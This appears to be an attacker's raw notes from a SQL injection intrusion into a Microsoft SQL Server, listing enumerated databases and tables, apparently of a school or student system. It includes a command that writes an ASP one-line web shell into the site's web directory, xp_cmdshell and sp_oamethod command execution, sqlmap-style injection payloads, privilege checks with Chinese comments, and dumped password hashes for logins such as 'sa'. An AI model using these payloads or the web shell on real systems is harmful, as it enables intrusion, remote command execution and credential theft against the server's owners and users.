Database: DS_C
[20 tables]
+---------------+
| blogList      |
| classList     |
| commentList   |
| dictList      |
| fbList        |
| fileList      |
| headList      |
| logList       |
| majorList     |
| mvpList       |
| openList      |
| praiseList    |
| problemList   |
| radioList     |
| recordList    |
| recycleList   |
| replyList     |
| shareList     |
| studentList   |
| viewedList    |
+---------------+

Database: tempdb
[18 tables]
+---------------+
| #A06D17B5     |
| #A0F46C5C     |
| #A7A169EB     |
| #A989B25D     |
| #AA7DD696     |
| #AC661F08     |
| #B036AFEC     |
| #B21EF85E     |
| #B3131C97     |
| #B568349B     |
| #B65C58D4     |
| #B7507D0D     |
| #B8CBF5ED     |
| #B9C01A26     |
| #BAB43E5F     |
| #BBA86298     |
| #BC9C86D1     |
| #BF78F37C     |
+---------------+

Database: ADS_Master
[20 tables]
+---------------+
| blogList      |
| classList     |
| commentList   |
| dictList      |
| fbList        |
| fileList      |
| headList      |
| logList       |
| majorList     |
| mvpList       |
| openList      |
| praiseList    |
| problemList   |
| radioList     |
| recordList    |
| recycleList   |
| replyList     |
| shareList     |
| studentList   |
| viewedList    |
+---------------+

Database: FZUSS
[1 table]
+---------------+
| logList       |
+---------------+

Database: ADSX
[27 tables]
+---------------+
| b_blog        |
| b_comment     |
| b_follow      |
| b_praise      |
| b_res         |
| b_viewed      |
| f_file        |
| f_folder      |
| f_plan        |
| f_share       |
| m_classAuth   |
| m_classAuth   |
| m_classChoose |
| m_course      |
| m_head        |
| m_major       |
| m_manager     |
| m_std         |
| m_user        |
| p_auth        |
| p_dict        |
| p_exp         |
| p_mvp         |
| p_problem     |
| p_submit      |
| s_notifyAuth  |
| s_notifyAuth  |
+---------------+

Database: AI_DB
[3 tables]
+---------------+
| scoreList     |
| stdinfo       |
| userList      |
+---------------+



exec sp_makewebtask 'D:\adi_bgqiqt\web\v2\x.asp','select''<%execute(request(1))%>'' '




exec sp_oamethod @luan,'exec',@exec output,'D:\adi_bgqiqt\web\v2\x.asp\\cmd.exe /c whoami';

BmQE' AND 8350 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(113)))-- GqlU

BmQE';DECLARE @xxen VARCHAR(8000);SET @xxen=0x646972;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @xxen-


SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);

SELECT (CASE WHEN (IS_SRVROLEMEMBER('db_owner')=1) THEN '1' ELSE '0' END);

SELECT (CASE WHEN (IS_SRVROLEMEMBER('public')=1) THEN '1' ELSE '0' END);


and 1=(select is_srvrolemember('sysadmin')) //判断是否是系统管理员

and 1=(select is_srvrolemember('db_owner')) //判断是否是库权限

and 1=(select is_srvrolemember('public')) //判断是否为public权限


select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins [4]:                                                                                                                          
[*] ##MS_PolicyEventProcessingLogin##, 0x0200fb8ba9022fe5e7569a64c87556a9c40295ce90b776114486956621b7e69f05c34bbe947a4e8c621e982749147480402eebeea2a57dab029f467538109e17e54df7e7096a
[*] ##MS_PolicyTsqlExecutionLogin##, 0x020062ebfd85427a5a34e22d99a21a6e02a5d7326e8ede4e808a9c7b4b3f50ec0337edc6d83f95f0d314626a26ccd10454491f8dc87313d8f67ba7679c8acedfbad497b4231f
[*] gleaner, 0x02000e0fb122b44aa9440575a6ecf378608034095f24bdc21e74997326b3488c1cf0be331f737a087be3114bb6bcbe4d9723a23450bdb4242342d7f0b02f7c461fa7cf5b8ec0
[*] sa, 0x02006033c9d8ed5942f4ca31adfe73450132cf2ff5f5a70995a032d5cbd44a7b9ee7261869f2cdd933f91d4c4de60d4caeaf31ce43b92f250e940e56e72aef49b6eef98cdd54

ff40c923d84e9c3772f2830d551d708d